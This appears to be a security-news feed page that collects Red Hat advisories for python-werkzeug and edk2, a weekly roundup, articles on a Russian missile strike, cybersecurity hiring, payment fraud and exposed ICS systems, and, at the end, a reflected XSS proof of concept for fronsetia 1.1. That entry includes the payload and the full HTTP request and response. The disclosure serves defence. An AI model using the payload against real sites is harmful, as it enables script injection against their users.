Red Hat Security Advisory 2024-9976-03 - An update for python-werkzeug is now available for Red Hat OpenStack Platform 17.1. Issues addressed include a remote shell upload vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9976.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: RHOSP 17.1.4 (python-werkzeug) security updateAdvisory ID:        RHSA-2024:9976-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9976Issue date:         2024-11-25Revision:           03CVE Names:          CVE-2024-34069====================================================================Summary: An update for python-werkzeug is now available for Red Hat OpenStackPlatform (RHOSP) 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Werkzeug is a WSGI utility module. It includes a debugger, request andresponse objects, HTTP utilities to handle entity tags, cache controlheaders, HTTP dates, cookie handling, file uploads, a URL routing systemand a numerous community contributed add-on modules. Werkzeug is unicodeaware and does not enforce a specific template engine, database adapter ora specific way of handling requests. It is useful for end userapplications, such as blogs, wikis, and bulletin boards, that need tooperate in a wide variety of server environments.Security Fix(es):* user may execute code on a developer's machine (CVE-2024-34069)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34069References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279451

Red Hat Security Advisory 2024-9976-03

Red Hat Security Advisory 2024-9975-03 - An update for python-werkzeug is now available for Red Hat OpenStack Platform 17.1. Issues addressed include a remote shell upload vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9975.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: RHOSP 17.1.4 (python-werkzeug) security updateAdvisory ID:        RHSA-2024:9975-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9975Issue date:         2024-11-25Revision:           03CVE Names:          CVE-2024-34069====================================================================Summary: An update for python-werkzeug is now available for Red Hat OpenStackPlatform (RHOSP) 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Werkzeug is a WSGI utility module. It includes a debugger, request andresponse objects, HTTP utilities to handle entity tags, cache controlheaders, HTTP dates, cookie handling, file uploads, a URL routing systemand a numerous community contributed add-on modules. Werkzeug is unicodeaware and does not enforce a specific template engine, database adapter ora specific way of handling requests. It is useful for end userapplications, such as blogs, wikis, and bulletin boards, that need tooperate in a wide variety of server environments.Security Fix(es):* user may execute code on a developer's machine (CVE-2024-34069)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34069References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279451

Red Hat Security Advisory 2024-9975-03

Red Hat Security Advisory 2024-9956-03 - An update for edk2 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include an integer overflow vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9956.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: edk2 security updateAdvisory ID:        RHSA-2024:9956-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9956Issue date:         2024-11-25Revision:           03CVE Names:          CVE-2024-38796====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Integer overflows in PeCoffLoaderRelocateImage (CVE-2024-38796)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38796References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2315390

Red Hat Security Advisory 2024-9956-03

Red Hat Security Advisory 2024-9946-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include an integer overflow vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9946.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: edk2 security updateAdvisory ID:        RHSA-2024:9946-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9946Issue date:         2024-11-25Revision:           03CVE Names:          CVE-2024-38796====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Integer overflows in PeCoffLoaderRelocateImage (CVE-2024-38796)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38796References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2315390

Red Hat Security Advisory 2024-9946-03

A list of topics we covered in the week of November 18 to November 24 of 2024

November 25, 2024 - Cybercriminals are spamming content platforms like Spotify and Amazon with cracks, keygens, and forex trading platforms. We explain why.

November 25, 2024 - Hacktivists have breached Andrew Tate's learning platform The Real World and obtained 794,000 usernames for current and former members, as well as 324,382 email addresses of former clients.

November 22, 2024 - Meta provided some insight into their fight against pig butchering scammers, who are often victims of organized crime themselves

November 20, 2024 - People are receiving disturbing emails that appear to imply something has happened to their friend or family member.

November 20, 2024 - Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.

 A week in security (November 18 &#8211; November 24) 

This is the first time Russia has used its so-called Oreshnik intermediate-range ballistic missile in combat. The launch also serves as a warning to the West.

Two days ago, Russian president Vladimir Putin announced a change in the country's policy for employing nuclear weapons in conflict. Then, on Thursday, Russia attacked the Ukrainian city of Dnipro with a new type of ballistic missile capable of one day delivering multiple nuclear warheads to distant targets with little warning.

Putin says his ballistic missile attack on Ukraine is a warning to the West.

These events are just part of what has been a week of escalation in the war between Russia and Ukraine. In recent days, Ukraine fired US-made ATACMS tactical ballistic missiles and UK-supplied Storm Shadow missiles at targets in Russian territory for the first time. This followed approval by President Joe Biden for Ukraine to use US-provided longer-range missiles against Russian targets. Previously, Ukraine was only permitted to use them on its own territory.

In a rare televised statement Thursday, Putin said he ordered Russia's military to strike Dnipro, home to Soviet-era rocket factories, using a ballistic missile named Oreshnik. This means “hazelnut tree” in Russian. The attack was the first use of the Oreshnik missile “under combat conditions,” Putin said.

Videos from Dnipro posted on social media show multiple projectiles exploding as they impact the ground at high speed. Local residents in Dnipro said the Oreshnik missile struck an industrial plant operated by PA Pivdenmash, formerly known as Yuzhmash. The PA Pivdenmash factory previously manufactured booster stages for the Soviet-era Zenit rocket and, most recently, first-stage tanks for the US-operated Antares rocket for Northrop Grumman.

**Threats From the Kremlin**

Sabrina Singh, the Pentagon's deputy press secretary, called the weapon used Thursday an “experimental intermediate-range ballistic missile” based on Russia's RS-26 Rubezh intercontinental ballistic missile model. While the strike before dawn Thursday used conventional munitions, the impact of multiple projectiles suggests the missile employed multiple reentry vehicles, or MIRVs, similar to the way Russia might use the missile in a nuclear attack.

Singh said the missile could be refitted with different types of conventional or nuclear warheads. She said Russia notified the US government of the planned attack “briefly” before it happened through nuclear risk-reduction channels.

Ukrainian government officials initially said the attack on Dnipro was by an ICBM rather than an intermediate-range weapon, or IRBM.

ICBMs typically follow long, arcing trajectories that take the missiles into space, above the discernible atmosphere, as they travel to faraway targets. An intermediate-range missile, classified as a weapon that can travel between 3,000 and 5,500 kilometers, could also reach space, although the exact altitude reached by the Oreshnik missile was unknown Thursday.

“An IRBM and an ICBM, they can have similar flight paths. They can have high trajectories,” Singh said. “They can carry large payloads, but the main difference lies in the range and the strategic purpose.”

The Oreshnik missile launched Tuesday apparently took off from Russia’s Kapustin Yar rocket base roughly 800 kilometers from Dnipro, well away from intense fighting.

This is the first time any IRBM has been used in combat. The Intermediate-Range Nuclear Forces Treaty, ratified by the United States and the Soviet Union in 1988, banned ground-launched IRBMs. The US pulled out of the treaty in 2019 under the first Trump administration, citing noncompliance from Russia. At the time, US officials noted that China, which was not a signatory to the treaty, possessed more than 1,000 IRBMs in its arsenal.

Putin said Western air defenses are not capable of destroying the Oreshnik missile in flight, although this claim can't be verified. He said Russia would provide warnings to Ukraine in advance of similar missile attacks in the future to allow civilians to escape danger zones.

The Oreshnik missiles strike their targets at speeds of up to Mach 10, or 2.5 to 3 kilometers per second, Putin said. “The existing air defense systems around the world, including those being developed by the US in Europe, are unable to intercept such missiles.”

**A Global War?**

In perhaps the most chilling part of his remarks, Putin said the conflict in Ukraine is “taking on global dimensions” and said Russia is entitled to use missiles against Western countries supplying weapons for Ukraine to use against Russian targets.

“In the event of escalation, we will respond decisively and in kind,” Putin said. “I advise the ruling elites of those countries planning to use their military forces against Russia to seriously consider this.”

The change in nuclear doctrine authorized by Putin earlier this week also lowers the threshold for Russia’s use of nuclear weapons to counter a conventional attack that threatens Russian “territorial integrity.”

This seems to have already happened. Ukraine launched an offensive into Russia’s Kursk region in August, taking control of more than 1,000 square kilometers of Russian land. Russian forces, assisted by North Korean troops, are staging a counteroffensive to try to retake the territory.

Singh called Russia’s invitation of North Korean troops “escalatory” and said Putin could “choose to end this war today.”

US officials say Russian forces are suffering some 1,200 deaths or injuries per day in the war. In September, The Wall Street Journal reported that US intelligence sources estimated that a million Ukrainians and Russians had been killed or wounded in the war.

The UN Human Rights Office most recently reported that 11,973 civilians have been killed, including 622 children, since the start of the full-scale Russian invasion in February 2022.

“We warned Russia back in 2022 not to do this, and they did it anyways, so there are consequences for that,” Singh said. “But we don't want to see this escalate into a wider regional conflict. We don't seek war with Russia.”

_This story originally appeared on_ _Ars Technica._

Russia’s Ballistic Missile Attack on Ukraine Is an Alarming First

While the need for cybersecurity talent still exists, the budget may not. Here's how to maximize security staff despite hiring freezes.

Source: imtmphoto via Alamy Stock Photo

Talk of the talent gap in cybersecurity continues, with ISACA, ISC2, and even the Biden administration releasing new publications addressing the problem. Indeed, the US alone has almost half a million open cybersecurity positions, and ISC2 estimates a shortfall of 4.8 million professionals needed to secure the world's computing resources.

However, all that the surveys and studies tell us is that the cybersecurity sector is inadequately staffed, not that companies are looking to hire or that there are no people to fill positions. What exists is a disconnect between companies and candidates over issues like pay and required certifications, as well as budgeting struggles within organizations.

The recent "ISC2 2024 Cybersecurity Workforce Study" quantifies the budget issue inside companies. "In 2024, 25% of respondents reported layoffs in their cybersecurity departments, a 3% rise from 2023, while 37% faced budget cuts, a 7% rise from 2023," the report states. That means fewer job openings and less money to fill those positions that are opened.

Among a sea of qualified candidates, job seekers are struggling to figure out how to stand out to recruiters and hiring managers.

"I do tons of networking," says Xavier Ashe, a job seeker with more than 30 years' experience targeting director-level and CISO roles. "That's allowed me to get a number of opportunities to interview, but the competition is tough. Everyone is looking, and there are a lot of great folks I'm competing against."

**Hiring Expectations Are Misaligned**

In a Dark Reading article on this year's "Service for America" cybersecurity push, Shane Fry, CTO of RunSafe Security, blamed the employment gap on large organizations' tendency to favor highly skilled cyber workers with college degrees.

"This can lead to some great candidates, but it also ostracizes a large group of folks that are so passionate about cyber that they picked up the skills on their own and don't have a degree to put on a resume," Fry wrote. "There's a ton of opportunities for businesses to provide on-the-job training and external training courses to get people from the fringes of cybersecurity into the cybersecurity fold."

CyberSeek, a joint project between tech certification organization CompTIA, labor market analyst Lightcast, and US federal cybersecurity program NICE, shows that external training might require better alignment between job seekers and hiring organizations. Its cybersecurity career heat map compares certifications held and certifications requested. Some certs, like CompTIA+ and Certified Information Systems Security Professional (CISSP), are overrepresented in the hiring pool, while others — such as Certified Information Systems Auditor (CISA) and Certified Information Security Manager (CISM) — do not have enough certification holders to meet employer demand.

CyberSeek illustrates a further misalignment in its Career Pathway graphic, which represents entry-level, mid-level, and advanced-level positions with circles proportionally sized to the number of job openings. All of the entry-level and all but one of the mid-level job types are tiny dots representing fewer than 7,000 jobs nationwide in the US; the big circles representing north of 24,000 job openings are out of reach of people making a career switch or just starting out.

Besides how the field tilts away from early-career job seekers, senior-level candidates are running into a different issue: disparity between what they expect to be paid for their experience level and what job listings offer. Budget cuts affect the hiring environment, even leading to layoffs, according to ISC2's study. "In 2023, the top causes for talent and skills gaps were an inability to find the talent or skills they needed to succeed," the ISC2 said. "But today, it's not about supply, it's about limited resources for hiring."

That matches Ashe's job-hunting experience. "The big companies are lowballing executive compensation," he says. "I turned down one offer this summer due to the pay cut I would have to take."

The ISC2 study found a 0.1% increase in global cybersecurity workers in 2024 over 2023. Compared to the 8.7% increase in 2023 over 2022, "This year's numbers suggest that hiring has slowed for 2023–2024," the study concludes.

**If You Can't Hire, Improve the Tech**

So if nobody is hiring entry-level people, and nobody can hire higher-level professionals because of salary requirements, how can an organization maintain its cybersecurity team? By keeping existing workers from jumping ship, says Steve Wilson, chief product officer at Exabeam.

One way to create a better working environment, Wilson says, is to make the workload less crushing by automating more. Machine learning algorithms analyze raw data as it flows through the network, continuously learning patterns of normal behavior and identifying anomalies. When a suspicious case emerges, traces of unusual activity are summarized and presented in natural language, making it easier for analysts to interpret the data without sifting through dense logs. This approach saves time and allows security professionals to focus their efforts where they matter most.

"It's about reaching the point where we can identify what's abnormal and worrisome, and then get that in front of a human analyst to take action," says Wilson. "That's where the real work starts and where the time saved becomes so valuable."

For the beginning analyst, these kinds of tools allow them to understand exactly what is suspicious about a flagged issue, in the process learning to understand the technical points, Wilson says. This gives Tier 1 analysts a chance to fix the problem themselves rather than escalate it to a Tier 3 analyst. By reducing escalations, the workload for Tier 3 analysts is eased, and they can use the LLM to search for obscure data points for tougher problems.

"It builds the skills for those younger ones because they can ask the dumb question without feeling like they're exposing themselves," Wilson says. "And then it frees up the time on those senior ones to actually go work the really tricky problems."

Notes Bryan Kissinger, CISO and senior VP at Trace3: "People get burned out when they're doing a job they don't like or their team around them is not supportive of work/life balance," he says. "The more repetitive and mundane activities ... a lot of that can be taken up by tools and automation."

**The Right People, If You Can Keep Them**

While poor salaries dropped as the reason cybersecurity talent left a job, from 54% in 2023 to 50% in 2024, work stress levels pushed 46% of staff to leave their cybersecurity jobs this year (up from 43% in 2023). That's according to the ISACA's "Global State of Cybersecurity 2024," which also cited lack of support from management (34%), poor work culture (32%), and return-to-office initiatives (32%) as reasons people quit.

Retention is key to Trace3, Kissinger adds. "Sometimes it's very challenging to tell when someone's burning out," he says. "\[An employee was\] ready to leave because they were burning out, and I said, 'This is the first I've heard about it. Can we bring on some contractors to help us moderate the workload?' Unless people speak up, you're really doing yourself a disservice."

Adds Wilson: "Sometimes these automation products, whether they're cybersecurity or marketing or whatever, there's a value proposition that says you can have less people on your staff. I don't think there's anybody saying, 'I'm spending too much on my SOC team — I'm going to reduce that by bringing in automation.' What they're saying is, 'My SOC team is overwhelmed, and people are quitting because they're burned out.'"

**About the Author**

Karen joined Dark Reading in January 2022 as features editor. She's been in tech editing since before the img tag was introduced, working for outlets such as the IEEE Computer Society, CNET Download.com, and TechTV. She lives in Los Angeles with her husband, son, and two cats. Find her on Mastodon.

What Talent Gap? Hiring Practices Are the Real Problem

Learn how to prevent payment fraud with effective fraud detection, online prevention solutions, and secure payment orchestration strategies.…

Learn how to prevent payment fraud with effective fraud detection, online prevention solutions, and secure payment orchestration strategies.

****The Basics of Fraud Prevention in Online Payments****

With the surge in e-commerce and digital payments, fraudulent transactions have become more sophisticated, costing businesses billions annually. For businesses, effective **fraud prevention tools** and solutions have become a necessity.

This article explores the essentials of payment fraud prevention, highlighting common threats, the role of payment orchestration platforms with advanced security measures, and best practices to safeguard transactions.

****Common Types of Payment Fraud****

Understanding the **types of fraudulent payments** is the first step in implementing an effective fraud prevention strategy. Here’s the list of the most common types of online payment fraud:

*   **Identity theft:** Fraudsters use stolen identities to make unauthorised purchases or access accounts.
*   **Phishing scams:** Cybercriminals trick users into revealing sensitive payment data and further misuse it.
*   **Card-not-present or CNP fraud**: This occurs during online transactions without the physical card, making verification more difficult.
*   **Chargeback fraud**: Fraudsters make purchases and later dispute the charges to reclaim the funds.

Each of these threats underscores the need for robust online fraud prevention solutions and payment fraud detection systems.

****Essential Security Features for Fraud Prevention****

Investing in advanced security measures is key to mitigating payment fraud risks. Online businesses often implement tokenisation and encryption to secure sensitive payment information by converting it into protected formats that are unusable to fraudsters.

Also, two-factor authentication adds an extra layer of security by requiring dual forms of identification, while AI-powered payment fraud analytics enhance fraud detection by analysing patterns to identify and block fraudulent transactions in real-time.

Traditionally, compliance with PCI DSS standards ensures adherence to the highest levels of payment data protection. Payment processing solutions, including **white-label ISO/MSP** platforms, often incorporate these features, enabling businesses to safeguard against fraudulent transactions effectively.

****Best Practices for Fraud Prevention****

Implementing a comprehensive **fraud prevention strategy** requires a mix of technology, policies, and education. The following list will help you understand the basics.

*   Adopt advanced fraud detection tools. **Utilise AI and machine learning** for real-time monitoring and alerts.
*   Regularly update security protocols. Cyber threats evolve rapidly, necessitating frequent updates to your systems.
*   Educate your team and customers. Training employees and informing customers about common fraud tactics helps mitigate risks.
*   Leverage payment orchestration. Streamlined payment routing with fraud checks reduces vulnerabilities.
*   Conduct payment fraud analytics. Regular analysis of transaction data can reveal patterns indicative of fraud.

By adopting these practices, businesses can better protect themselves against payment fraud while keeping transactions smooth and secure for everyone.

**Conclusion**

Payment fraud is a growing threat that demands businesses to invest in **anti-fraud strategies** and leverage advanced technologies like payment fraud detection and analytics to protect their revenue and reputation. Staying alert and regularly updating fraud prevention strategies is key to long-term success in the world of digital payments.

1.  Best Paid and Free OSINT Tools for 2024
2.  How ID Scanning Apps Can Prevent Fraud
3.  Leveraging AI for Enhanced Threat Detection – Prevention
4.  Imperative of Automating Fraud Detection in Financial Institutions
5.  Why Incident Response Plans Are Key to Cybersecurity Resilience

Fraud Prevention in Online Payments: A Practical Guide

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%.…

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%. Vulnerabilities in outdated protocols and exposed HMIs put critical infrastructure at severe risk, says Censys.

The Internet has revolutionized numerous industries, including manufacturing, energy, and water treatment. However, as more and more **industrial control systems** (ICS) are connected to the internet, they become increasingly vulnerable to cyberattacks. 

According to Censys’ annual State of the Internet Report, shared with Hackread.com, internet-exposed human-machine interfaces (HMIs) are the emerging new threat in ICS security. For your information, HMIs are the graphical interfaces used to monitor and control industrial systems.

The screenshot displays the HMI for a three-pump system, featuring options to monitor alarms, manage controls, and adjust system setpoints (Image credit: Censys).

Researchers at Censys, a leading internet intelligence company, observed that HMIs have become increasingly connected to the internet to enable remote access and management. This connectivity has opened the door to cyberattacks. This is concerning as in 2023 and 2024, we witnessed a series of attacks targeting internet-exposed HMIs, demonstrating the potential for significant disruption and damage.

One notable attack was carried out by the CyberAv3ngers, an Iranian hacking group, **who targeted** a water treatment facility in Pennsylvania, exploited a vulnerable HMI to gain control of the system and defaced it with an anti-Israel message. Another significant attack was from the Cyber Army of Russia Reborn, which **attacked** water facilities in Texas, manipulating HMIs to cause water storage tanks to overflow.

Censys’ report reveals that there are over 145,000 exposed ICS services worldwide, and over 40,000 Internet-connected ICS located in the United States with over half of them linked to building control and automation protocols.

“38% of these services are in North America, 35% are in Europe, and 22% are in Asia. The U.S. alone is responsible for over one-third of global ICS service exposures,” Censys’ **report** read.

The study also found that 18,000 exposed devices were more likely to control industrial systems. In the UK, approximately 1,500 control systems exposed on the public Internet were identified through scans of 18 automation protocols. Over 80% of these administration interfaces are for building controls.

Additionally, over 50% of hosts running low-level automation protocols are concentrated in ISPs, while over 80% of hosts running exposed HMIs are found in wireless networks like Verizon and AT&T. Moreover, about half of the HMIs associated with Water and Wastewater could be manipulated without authentication.

These exposed systems become a tempting target for cybercriminals and nation-state actors who could potentially disrupt critical infrastructure.

Researchers have also observed a high prevalence of outdated and insecure protocols. Many of these protocols, such as Modbus, S7, and IEC 60870-5-104, are decades old and lack advanced security features. Researchers discovered nearly 200 hosts running HMIs that were also running products from vendors explicitly prohibited by the US’s National Defense Authorization Act (NDAA) Section 889. 

The report highlights the need for operators to be mindful of what products and software they allow to run alongside industrial processes. Researchers recommend that security teams must examine the exposure of these protocols and HMIs, which for a vital component of the security of industrial control systems.

1.  **Malware can fully compromise building control systems**
2.  **Flaws can let hackers physically damage moving bridges**
3.  **Flaws in US Drinking Water Systems Put 26 Million at Risk**
4.  **Propump and Controls’ Osprey Pump Controller vulnerable**
5.  **Ransomware targeted SCADA systems of 3 US water facilities**

US and Europe Account for 73% of Global Exposed ICS Systems

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

Tag

#mac